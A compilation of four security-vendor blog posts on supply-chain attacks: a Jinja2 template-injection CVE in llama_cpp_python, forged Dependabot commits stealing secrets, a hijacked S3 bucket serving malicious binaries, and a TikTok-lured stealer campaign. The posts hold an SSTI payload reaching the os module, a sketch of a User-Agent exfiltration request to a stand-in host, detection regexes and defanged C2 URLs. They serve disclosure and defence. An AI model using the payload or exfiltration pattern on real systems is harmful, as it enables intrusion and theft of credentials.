Llama Drama: Critical Vulnerability CVE-2024-34359 Threatening Your Software Supply Chain
https://checkmarx.com/blog/llama-drama-critical-vulnerability-cve-2024-34359-threatening-your-software-supply-chain/
May 16, 2024

Key Points
  • The critical vulnerability CVE-2024-34359 has been discovered by retr0reg in the “llama_cpp_python” Python package.
  • This vulnerability allows attackers to execute arbitrary code through the misuse of the Jinja2 template engine.
  • Over 6,000 AI models on Hugging Face that use llama_cpp_python and Jinja2 are vulnerable.
  • A fix has been issued in version 0.2.72.
  • This vulnerability underscores the importance of security in AI systems and in the software supply chain.

Imagine downloading a seemingly harmless AI model from a trusted platform like Hugging Face, only to discover that it has opened a backdoor for attackers to control your system. This is the potential risk posed by CVE-2024-34359. This critical vulnerability affects the popular llama_cpp_python package, which is used for integrating AI models with Python. If exploited, it could allow attackers to execute arbitrary code on your system, compromising data and operations. Over 6,000 models on Hugging Face were potentially vulnerable, highlighting the broad and severe impact this could have on businesses, developers, and users alike. This vulnerability underscores the fact that AI platforms and developers have yet to fully catch up to the challenges of supply chain security.

Understanding Jinja2 and llama_cpp_python

Jinja2: This library is a popular Python tool for template rendering, primarily used for generating HTML. Its ability to execute dynamic content makes it powerful but can pose a significant security risk if not correctly configured to restrict unsafe operations.

`llama_cpp_python`: This package integrates Python’s ease of use with C++’s performance, making it ideal for complex AI models handling large data volumes. However, its use of Jinja2 for processing model metadata without enabling necessary security safeguards exposes it to template injection attacks.


What is CVE-2024-34359?

CVE-2024-34359 is a critical vulnerability stemming from the misuse of the Jinja2 template engine within the `llama_cpp_python` package. This package, designed to enhance computational efficiency by integrating Python with C++, is used in AI applications. The core issue arises from processing template data without proper security measures such as sandboxing, which Jinja2 supports but was not implemented in this instance. This oversight allows attackers to inject malicious templates that execute arbitrary code on the host system.
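To make the risk concrete, here is a minimal, hedged sketch of the underlying issue (not the llama_cpp_python code itself): rendering an untrusted template with Jinja2's default Environment lets template expressions walk Python attribute chains down to the os module, while the SandboxedEnvironment that Jinja2 ships for exactly this purpose blocks the access. The attribute chain shown is a well-known example payload; exact chains vary across Jinja2 versions.

```python
# Minimal sketch of the issue, not the llama_cpp_python implementation.
from jinja2 import Environment
from jinja2.exceptions import SecurityError
from jinja2.sandbox import SandboxedEnvironment

# A template string an attacker could embed in a model's metadata.
# The chain reaches the `os` module; from there, arbitrary commands are possible.
payload = "{{ cycler.__init__.__globals__.os.getcwd() }}"

# Unsafe: the default environment evaluates the expression.
print(Environment().from_string(payload).render())  # prints the working directory

# Safer: the sandboxed environment refuses access to unsafe attributes.
try:
    SandboxedEnvironment().from_string(payload).render()
except SecurityError as err:
    print("blocked by sandbox:", err)
```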

The Implications of an SSTI Vulnerability

The exploitation of this vulnerability can lead to unauthorized actions by attackers, including data theft, system compromise, and disruption of operations. Given the critical role of AI systems in processing sensitive and extensive datasets, the impact of such vulnerabilities can be widespread, affecting everything from individual privacy to organizational operational integrity.

The Risk Landscape in AI and Supply Chain Security

This vulnerability underscores a critical concern: the security of AI systems is deeply intertwined with the security of their supply chains. Dependencies on third-party libraries and frameworks can introduce vulnerabilities that compromise entire systems. The key risks include:

  • Extended Attack Surface: Integrations across systems mean that a vulnerability in one component can affect connected systems.
  • Data Sensitivity: AI systems often handle particularly sensitive data, making breaches severely impactful.
  • Third-party Risk: Dependency on external libraries or frameworks can introduce unexpected vulnerabilities if these components are not securely managed.

A Growing Concern

With over 6,000 models on the HuggingFace platform using `gguf` format with templates—thus potentially susceptible to similar vulnerabilities—the breadth of the risk is substantial. This highlights the necessity for increased vigilance and enhanced security measures across all platforms hosting or distributing AI models.

Mitigation

The vulnerability identified has been addressed in version 0.2.72 of the llama-cpp-python package, which includes a fix enhancing sandboxing and input validation measures. Organizations are advised to update to this latest version promptly to secure their systems.
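If you want to verify programmatically that a patched build is in place, a small hedged check like the following works; it assumes the package is installed under its PyPI name and uses a plain three-part version comparison.

```python
# Hedged helper: confirm the installed llama-cpp-python is at or above the
# version that contains the fix (0.2.72 per the advisory).
from importlib.metadata import PackageNotFoundError, version

MIN_SAFE = (0, 2, 72)

def llama_cpp_python_is_patched() -> bool:
    try:
        installed = version("llama_cpp_python")
    except PackageNotFoundError:
        return True  # not installed, nothing to update
    parts = tuple(int(p) for p in installed.split(".")[:3])
    return parts >= MIN_SAFE

if __name__ == "__main__":
    print("patched" if llama_cpp_python_is_patched() else "vulnerable, update to >= 0.2.72")
```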

Conclusion

The discovery of CVE-2024-34359 serves as a stark reminder of the vulnerabilities that can arise at the confluence of AI and supply chain security. It highlights the need for vigilant security practices throughout the lifecycle of AI systems and their components. As AI technology becomes more embedded in critical applications, ensuring these systems are built and maintained with a security-first approach is vital to safeguard against potential threats that could undermine the technology’s benefits.

Surprise: When Dependabot Contributes Malicious Code
https://checkmarx.com/blog/surprise-when-dependabot-contributes-malicious-code/
September 27, 2023

What Happened?
  • In July 2023, our scanners detected atypical commits to hundreds of GitHub repositories that appeared to be contributed by Dependabot and carried malicious code.
  • These commit messages were fabricated by threat actors to appear as automated Dependabot contributions in the commit history, in an attempt to disguise the malicious activity.
  • After reaching out and talking to some of the compromised victims, we can confirm that the victims’ GitHub personal access tokens were stolen and used by the attackers to push these malicious contributions.
  • The malicious code exfiltrates the GitHub project’s defined secrets to a malicious C2 server and modifies any existing JavaScript files in the attacked project with web-form password-stealer code, affecting any end user who submits their password in a web form.
  • The attack also impacted private GitHub organization repositories that some of the victims’ GitHub tokens had access to.
  • It is unclear how the victims’ personal access tokens were stolen – it may be due to a malicious open-source package installed on their machines.
  • In this blog, we will elaborate on the malicious payload and on why access via GitHub personal access tokens is currently undetectable to most GitHub users.

About Dependabot 

Dependabot is GitHub’s free automated dependency management tool for software projects. It continuously monitors a project’s dependencies (like libraries and packages) for security vulnerabilities and outdated versions. When it detects issues, it automatically generates pull requests with updates, helping developers keep their software secure and up to date.  

A screenshot of dependabot’s automatic pull-request from the Flask project 

The Fake Dependabot Commits 

Between July 8 and 11, 2023, a threat actor compromised hundreds of GitHub repositories, both public and private. Most of the victims are Indonesian user accounts. The attackers used a technique to fake commit messages (read more about how it’s done here) to trick developers into thinking the changes were contributed by the real Dependabot and into ignoring the activity.

The attackers created commits with the message “fix” that appear to be contributed by the user account “dependabot[bot]”.

A screenshot of the fake commit, taken from highpolar-softwares/I-help-privacy-policy repository 

Malicious Code 

In the various repositories we analyzed (the full list remains internal, but it spans hundreds of repositories), we saw two groups of repeated code changes, most likely made with an automated script.

A New GitHub Action to Steal Secrets 

A new GitHub Action file named “hook.yml” was added as a workflow file triggered by code push events. On every push, it sends the repository’s GitHub secrets and variables to the URL hxxps://send[.]wagateway[.]pro/webhook.

A screenshot of the malicious commit contributed to highpolar-softwares/I-help-privacy-policy 
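A rough way to hunt for this pattern in your own repositories is to flag workflow files that reference secrets and also talk to hosts outside an allowlist. The sketch below is a hedged heuristic, not a reconstruction of hook.yml; the allowlist and the secret-reference strings are assumptions to adapt to your environment.

```python
# Heuristic scan: workflows that reference secrets AND contact unfamiliar hosts.
import pathlib
import re

ALLOWED_HOSTS = {"github.com", "api.github.com"}  # example allowlist, extend as needed
URL_RE = re.compile(r"https?://([^/\s\"']+)")

def suspicious_workflows(repo_root: str = "."):
    for wf in pathlib.Path(repo_root, ".github", "workflows").glob("*.y*ml"):
        text = wf.read_text(errors="ignore")
        uses_secrets = "secrets." in text or "toJSON(secrets)" in text
        external_hosts = {h for h in URL_RE.findall(text) if h not in ALLOWED_HOSTS}
        if uses_secrets and external_hosts:
            yield wf, sorted(external_hosts)

if __name__ == "__main__":
    for path, hosts in suspicious_workflows():
        print(f"{path}: references secrets and contacts {hosts}")
```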

Patching *.js Files to Steal Passwords 

In addition to the added GitHub Action, the attackers modified every existing project file with a “.js” extension, appending an obfuscated line at the end of the file.

This new line is designed to create a new script tag when the code is executed in a browser environment and to load an additional script from this URL: hxxps://send[.]wagateway[.]pro/client.js?cache=ignore.

A screenshot of the malicious commit contributed to juniorriau/kejaribiak 

The code loaded from hxxps://send[.]wagateway[.]pro/client.js?cache=ignore attempts to intercept any web-based password form and send the user credentials to the same exfiltration endpoint as before: hxxps://send[.]wagateway[.]pro/webhook.

A screenshot of the malicious code designed to steal web-form credentials.
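Because the injection is always a single obfuscated line appended to the end of existing .js files, a simple repository sweep can surface it. The sketch below is a hedged heuristic based on the behavior described above (a dynamically created script tag pointing at an external URL), not the attacker’s exact payload.

```python
# Flag .js files whose last line looks like an appended script-injection one-liner.
import pathlib
import re

INJECT_RE = re.compile(r"createElement\(['\"]script['\"]\)|\.src\s*=\s*['\"]https?://", re.I)

def suspicious_js_tails(repo_root: str = "."):
    for js_file in pathlib.Path(repo_root).rglob("*.js"):
        try:
            lines = js_file.read_text(errors="ignore").splitlines()
        except OSError:
            continue
        if lines and INJECT_RE.search(lines[-1]):
            yield js_file, lines[-1][:120]

if __name__ == "__main__":
    for path, tail in suspicious_js_tails():
        print(f"{path}: suspicious appended line: {tail}")
```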

How Was It Done? 

At first, it was unclear to us how the attackers got access to those accounts, especially since GitHub had raised the bar earlier this year by making 2FA mandatory.

To get a better understanding of how this happened, we approached some of the victims by sending an email notifying them of the breach and asking for help understanding the full picture.  

Luckily, some victims agreed to share information with us, and surprisingly, when inspecting the account activity, we realized that the attackers had accessed the accounts using compromised PATs (personal access tokens), most likely exfiltrated silently from the victims’ development environments.

Step 1 – Workspace Initialization 

The victim sets up their development environment with a personal access token (or SSH/GPG key) that identifies their account whenever they perform git operations. This token is stored locally on the developer’s machine and can be extracted easily.

Such access tokens do not require 2FA and can be used to access the account by any computer with internet access. 
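Whether a token on a given machine is sitting in plaintext is easy to check. The snippet below is a minimal audit sketch assuming the common git “store” credential helper layout; other helpers (OS keychains, credential managers) store tokens differently.

```python
# Minimal audit sketch: look for plaintext git credentials on a dev machine.
import os
import subprocess

def find_plaintext_git_credentials():
    findings = []
    # The "store" helper keeps tokens unencrypted in this file by default.
    cred_file = os.path.expanduser("~/.git-credentials")
    if os.path.exists(cred_file):
        findings.append(f"plaintext credential file present: {cred_file}")
    try:
        helper = subprocess.run(
            ["git", "config", "--get", "credential.helper"],
            capture_output=True, text=True, check=False,
        ).stdout.strip()
        if helper == "store":
            findings.append("credential.helper=store (tokens saved unencrypted)")
    except FileNotFoundError:
        pass  # git not installed on this machine
    return findings

if __name__ == "__main__":
    for finding in find_plaintext_git_credentials():
        print(finding)
```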

Step 2 – Stealing the Developer’s Credentials 

We can only guess how the attackers got the developers’ credentials, but the many cases we have seen of malicious packages built to perform exactly that task suggest one likely way the attackers could have gotten their hands on those precious GitHub tokens.

We believe the most likely scenario is that the victims were infected with such a malicious package, which exfiltrated the token to the attacker’s C2 server. 

Step 3 – Poisoning the Victim’s Code Projects 

In this step, the attackers used the victims’ stolen personal access tokens to authenticate to GitHub and make the malicious code changes described above.

Analysis of the scale of the attack reveals that it appears to be automated. 

Conclusion

This whole situation teaches us to be careful about where we get our code, even from trusted places like GitHub. It shows that even big platforms can have problems, so we need to always watch out and protect ourselves online.

This is the first incident in which we have witnessed a threat actor using fake git commits to disguise activity, counting on the fact that many developers do not review the actual changes when they appear to come from Dependabot.

To make things safer, consider switching to GitHub’s fine-grained personal access tokens. These tokens can be scoped to specific repositories and permissions, reducing the risk posed by a compromised token: if someone malicious gets hold of one, they cannot do much damage.

Sadly, GitHub’s access log activity for personal access tokens is only visible to enterprise accounts. If your token was compromised, you cannot know for sure, since this information is not shown to non-enterprise users in the audit log section.

The attacker’s tactics, techniques, and procedures (TTPs), which include faking commits, stealing user credentials, and impersonating Dependabot to avoid detection, show that supply chain attacks are getting more sophisticated as attackers realize it does not take much to move silently.

IOCs:

  • wagateway[.]pro
  • hxxps://send[.]wagateway[.]pro/webhook
  • hxxps://send[.]wagateway[.]pro/client.js

Timeline

  • During 2023 – The attacker targeted victims and harvested personal access tokens (we do not know how this was done; we suspect malicious packages were involved).
  • 2023-07-08 – The attacker used stolen GitHub tokens in an automated attack, poisoning multiple repositories.
  • 2023-07-24 – We first noticed this anomaly and began investigating.
  • 2023-07-24 – We contacted the GitHub accounts affected by this attack and reported it to GitHub.
  • 2023-09-20 – We met with one of the victims and reviewed their access logs, which helped us understand the attack flow.
Hijacking S3 Buckets: New Attack Technique Exploited in the Wild by Supply Chain Attackers
https://checkmarx.com/blog/hijacking-s3-buckets-new-attack-technique-exploited-in-the-wild-by-supply-chain-attackers/
June 15, 2023

Without altering a single line of code, attackers poisoned the NPM package “bignum” by hijacking the S3 bucket serving binaries necessary for its function and replacing them with malicious ones. While this specific risk was mitigated, a quick glance through the open-source ecosystem reveals that dozens of packages are vulnerable to this same attack.

The malicious binaries steal user IDs, passwords, local machine environment variables, and the local hostname, and then exfiltrate the stolen data to the hijacked bucket.

Intro 

A few weeks ago, a GitHub advisory was published reporting malware in the NPM package “bignum”.

The advisory described the interesting way in which the package was compromised.

The latest version of “bignum”, 0.13.1, was published more than 3 years ago and had never been compromised. However, several prior versions were. 

Versions 0.12.2-0.13.0 relied upon binaries hosted on an S3 bucket. These binaries would get pulled from the bucket upon installation to support the functioning of the package. About 6 months ago, this bucket was deleted (the versions relying on it were mostly out of use). 

This opened the bucket to a takeover, which resulted in the incident we are going to dive into. 

What are “S3 Buckets”? 

An S3 bucket is a storage resource provided by Amazon Web Services (AWS) that allows users to store, and retrieve, vast amounts of data over the Internet. It functions as a scalable, and secure, object storage service, storing files, documents, images, videos, and any other type of digital content. S3 buckets can be accessed using unique URLs, making them widely used for various purposes such as website hosting, data backup and archiving, content distribution, and application data storage. 

The Beginning: Hijacking an Abandoned S3 Bucket  

The NPM package “bignum” was found to leverage “node-gyp” to download a binary file during installation. The binary file was initially hosted on an Amazon AWS S3 bucket which, if inaccessible, would prompt the package to look for the binary locally.

However, an unidentified attacker noticed the sudden abandonment of a once-active AWS bucket. Recognizing an opportunity, the attacker seized the abandoned bucket. Consequently, whenever bignum was downloaded or re-installed, the users unknowingly downloaded the malicious binary file, placed by the attacker.  

It is important to note that each AWS S3 bucket must have a globally unique name. When a bucket is deleted, its name becomes available again. If a package points to a bucket as its source, the pointer continues to exist even after the bucket’s deletion. This quirk allowed the attacker to re-register the abandoned name, so the package’s existing pointer silently resolved to the attacker-controlled bucket.
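Checking whether a bucket referenced by a package is still claimed is straightforward: an existing bucket answers 200 or 403, while a deleted (and therefore claimable) name answers 404. The sketch below is a hedged example with a made-up bucket name; regional endpoints and request styles can vary.

```python
# Hedged check: does the S3 bucket a dependency points at still exist?
import requests

def bucket_is_unclaimed(bucket_name: str) -> bool:
    resp = requests.head(f"https://{bucket_name}.s3.amazonaws.com/", timeout=10)
    # 200 = public bucket, 403 = exists but access denied, 404 = no such bucket.
    return resp.status_code == 404

if __name__ == "__main__":
    # Example name only; substitute the bucket your dependencies download from.
    print(bucket_is_unclaimed("some-abandoned-prebuilt-binaries-bucket"))
```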

The Attack: Malicious Binary with Dual Functions 

This counterfeit .node binary mimicked the functions of the original file. It carried out the usual and expected activities of the package. Still, undetected by the user, it also included a malicious payload that was designed to steal user credentials and send them to the same hijacked bucket. The exfiltration was craftily performed within the user-agent of a GET request.
 

The Reversal: Unmasking the Hidden Functions  

The malicious .node file — essentially a C/C++ compiled binary — can be invoked within JavaScript applications, bridging JavaScript and native C/C++ libraries. This allows Node.js modules to tap into more performant lower-level code and opens a new attack surface regarding potential malicious activity. 

Reverse engineering the compiled file was no small task. Scanning the file with VirusTotal did not yield any results, since it was not detected as malware. However, looking at the strings contained within the file, it was easy to see some odd behavior, so I had to dive deep into the assembly.

Starting with an endless list of byte additions to registers, comparisons, and data movements that initially seemed pointless, the reversing effort finally paid off – a URL was constructed by individually reversing the string parts.

Further investigation revealed that the binary file harvested data via functions like getpwd and getuid (as seen in the strings printout), extracting environmental data. It then created a TCP socket for IPv4 communication and covertly sent the collected data as the user-agent of a GET request.
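To make the two tricks easier to picture, here is a conceptual Python approximation of what the compiled payload does. It is an illustration under assumptions (the fragments, hostname, and field layout are invented), not the binary’s actual code, and it does not send anything.

```python
# Conceptual approximation only: reversed string fragments hide the C2 host,
# and harvested data rides out in the User-Agent header of a plain GET.
import getpass
import os
import socket

# Stored reversed so the full address never shows up in a `strings` dump.
fragments = ["dekcajih", "elpmaxe.", "moc."]        # hypothetical fragments
c2_host = "".join(part[::-1] for part in fragments)  # -> "hijacked.example.com"

harvested = f"{getpass.getuser()}|{socket.gethostname()}|{os.environ.get('PATH', '')}"

# The real binary opened an IPv4 TCP socket and issued a request resembling:
request = (
    f"GET / HTTP/1.1\r\n"
    f"Host: {c2_host}\r\n"
    f"User-Agent: {harvested}\r\n"
    "Connection: close\r\n\r\n"
)
print(request)  # printed here instead of being sent anywhere
```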

The Ripple Effect  

Since it was the first time such an attack was observed, we conducted a quick search across the open-source ecosystem. The results were startling. We found numerous packages and repositories using abandoned S3 buckets that are susceptible to this exploitation. 

The impact of this novel attack vector can vary significantly. However, the danger it poses can be huge if an attacker manages to exploit it as soon as this kind of change occurs. Another risk is posed to organizations or developers using frozen versions or artifactories as they will continue to access the same, now hijacked, bucket.  

The Verdict  

This new twist in the realm of subdomain takeovers serves as a wake-up call to developers and organizations. It underscores the need for stringent checks and monitoring of package sources, and associated hosting resources.  

An abandoned hosting bucket or an obsolete subdomain is not just a forgotten artifact; in the wrong hands, it can become a potent weapon for data theft and intrusion.  

Proactive Step to Prevent Future Hijacks 

To prevent this attack from occurring elsewhere, we took over all the deserted buckets inside open-source packages we found in our search. Now when someone tries to reach the files hosted in these buckets, they will receive a disclaimer file we planted inside those buckets. 

Summary 

Attackers keep finding creative ways to poison our software supply chain, and this is a reminder of how fragile our supply chain processes are.  

We need to understand that relying on software dependencies to deliver compiled parts at build time may inadvertently deliver malware if an attacker takes over their storage service.

We would like to thank the maintainer of the package Rod Vagg and Caleb Brown at Google for their cooperation and assistance with this investigation. 

IOC 

  • Bignum v0.13.0:
      • MD5: 1e7e2e4225a0543e7926f8f9244b1aab
      • SHA-1: b2e1bffff25059eb38c58441e103e8589ab48ad3
      • SHA-256: 3c6793de04bfc8407392704b3a6cef650425e42ebc95455f3c680264c70043a7
  • Bignum v0.12.5:
      • MD5: f671a326b56c8986de1ba2be12fae2f9
      • SHA-1: ab97d5c64e8f74fcb49ef4cb3a57ad093bfa14a7
      • SHA-256: 3ba3fd7e7a747598502c7afbe074aa0463a7def55d4d0dec6f061cd3165b5dd1

Attacker Uses a Popular TikTok Challenge to Lure Users Into Installing Malicious Package
https://checkmarx.com/blog/attacker-uses-a-popular-tiktok-challenge-to-lure-users-into-installing-malicious-package/
November 28, 2022

     

      • A trending TikTok challenge called the “Invisible Challenge” has people filming themselves naked while using a special video effect called “Invisible Body.” This effect removes the person’s body from the video, leaving only a blurred contour image of it.

      • Attackers post TikTok videos with links to fake software called “unfilter” that claims to be able to remove TikTok filters on videos shot while the actor was undressed.

      • The instructions for getting the “unfilter” software actually deploy WASP stealer malware hiding inside malicious Python packages.

      • TikTok videos posted by the attacker reached over a million views in just a couple of days.

      • The GitHub repo hosting the attacker’s code was listed among GitHub’s daily trending projects.

      • Over 30,000 members have joined the Discord server created by the attackers so far, and this number continues to increase as the attack is ongoing.

    TikTok’s Invisible Challenge

    From time to time, there is a new dangerous trending challenge on social media. If you remember the “Tide Pods Challenge” or the “Milk Crate Challenge” you know exactly what I’m talking about.

    This time, the latest trending challenge is called the “Invisible Challenge,” where the person filming poses naked while using a special video effect called “Invisible Body.” This effect removes the character’s body from the video, making a blurred contour image of it.

    This challenge is quite popular on TikTok and currently has over 25 million views for the #invisiblefilter tag.

    “Unfilter” Software

     The TikTok users @learncyber and @kodibtc posted videos on TikTok (over 1,000,000 views combined) promoting a software app supposedly able to “remove filter invisible body,” along with an invite link to the Discord server “discord.gg/unfilter” to get it.

    Discord Server “Space Unfilter”

     Once you click the invite and join the Discord server “Space Unfilter,” you find NSFW videos uploaded by the attacker, claimed to be the result of his “unfilter” software. These sample videos are an attempt at “proof” to trick users into agreeing to install the software.

    In addition, a bot account, “Nadeko,” automatically sends a private message with a request to star the GitHub repository 420World69/Tiktok-Unfilter-Api.

    Trending GitHub Repo

     The GitHub repository 420World69/Tiktok-Unfilter-Api presents itself as an open-source tool that can remove the trending invisible-body effect on TikTok. It currently has 103 stars and 17 forks, through which the attacker gained the status of a trending GitHub project.

    Inside the project’s files is a .bat script that installs a malicious Python package listed in the requirements.txt file.

     Looking at the project’s history, the attacker used “pyshftuler”, a malicious package, but once it was reported and removed by PyPI, the attacker uploaded a new malicious package under a different name, “pyiopcs”. This latest package was also reported and removed, and at the time of writing he had yet to update his code.

    In addition, the project’s README file contains a link to a YouTube tutorial instructing users on how to run the installation script.

    Technical Analysis – Malicious Python Packages

    This campaign is linked to other malicious Python packages, “tiktok-filter-api”, “pyshftuler”, and “pyiopcs,” and since this is an ongoing attack, we’re keeping track of new updates.

     At first glance, the attackers used the StarJacking technique: the malicious package falsely states that its associated GitHub repository is “https://github.com/psf/requests”, which actually belongs to the popular Python package “requests”. Doing this makes the package appear popular to the naked eye.

    On top of that, the attackers stole and modified the legitimate package’s description, and the code inside those packages seems to be stolen from the popular Python package “requests”.
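     For readers unfamiliar with StarJacking, the trick is purely a metadata claim. Below is a hedged, simplified illustration (not the attacker’s actual file) of how a setup.py can point the package index at a popular repository the author does not own.

```python
# Simplified illustration of StarJacking; names and values are examples only.
from setuptools import setup

setup(
    name="tiktok-filter-api",                # package name used in the campaign
    version="1.0.0",
    description="Python HTTP for Humans.",   # description copied from the impersonated project
    url="https://github.com/psf/requests",   # popular repo the attacker does not own
    packages=[],
)
```

     A package index that displays repository statistics for the linked URL will then show the legitimate project’s stars and forks next to the malicious package.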

     Looking inside, we find a suspicious modification to the original file under “./<package>/models.py”: a one-liner related to WASP’s infection code.

    A Desperate Move

     After a cat-and-mouse game in which the attacker’s packages were repeatedly caught, reported, and removed by PyPI, the attacker decided to move his malicious infection line from the Python package to the requirements.txt file, as you can see in the screenshot below:

    Conclusion

    How does an attacker gain so much popularity in such a short time? He earned his status as a trending GitHub project by asking every new member on his server to “star” his project.

    The high number of users tempted to join this Discord server and potentially install this malware is concerning.

     The level of manipulation used by software supply chain attackers is rising as attackers become increasingly clever.

     It seems this attack is ongoing, and whenever the PyPI security team deletes his packages, he quickly improvises and creates a new identity or simply uses a different name.

     These attacks demonstrate again that cyber attackers have started to focus their attention on the open-source package ecosystem; we believe this trend will only accelerate in 2023.

     As we see more and more attacks, it is critical to expedite the flow of information about them across all parties involved (package registries, security researchers, developers) to protect the open-source ecosystem against these threats.

    Timeline

       

        • 2022-10-28 – WASP open source created

        • 2022-11-10 – Discord server “Unfilter Space” created

        • 2022-11-11 – TikTok videos published

        • 2022-11-12 – Python package “tiktok-filter-api” published by the attacker

        • 2022-11-12 – Python package “pyshftuler” published by the attacker

        • 2022-11-13 – “tiktok-filter-api” and “pyshftuler” reported as malicious to PyPI

        • 2022-11-18 – Python package “pyiopcs” published by the attacker

        • 2022-11-19 – Python package “pyiopcs” reported as malicious to PyPI

        • 2022-11-22 – GitHub repo reported as malicious

        • 2022-11-22 – Discord Server reported as malicious

        • 2022-11-22 – TikTok videos reported as scam

        • 2022-11-22 – Attacker moved malicious code from the PyPI package to requirements.txt

        • 2022-11-23 – Attacker removed the malicious code from his repo

        • 2022-11-26 – Attacker added the same malicious code to main.py and method.py

        • 2022-11-27 – Discord server “Unfilter Space” deleted

        • 2022-11-27 – Attacker changed his GitHub repository name to 42World69/Nitro-generator

        • 2022-11-27 – Attacker deleted old files from his repo and uploaded files to fit Nitro-generator

        • 2022-11-27 – Python package “pydesings” published by the team behind WASP

        • 2022-11-27 – Attacker added malicious package “pydesings” to requirements.txt

        • 2022-11-27 – Attacker added malicious code to main.py

        • 2022-11-28 – Python package “pyshdesings” published by WASP creators

      IOC

         

          • hxxp://51.103.210[.]236/inject/UU7X9zT79b6aHuvL

          • hxxp://51.103.210[.]236/grab/UU7X9zT79b6aHuvL

          • hxxp://51.103.210[.]236:80/inject/qiNbZFHkBHmbLQXS

          • hxxp://51.103.210[.]236:80/grab/qiNbZFHkBHmbLQXS

          • hxxp://51.103.210[.]236:80/inject/VSpinLJKHaPMTkic
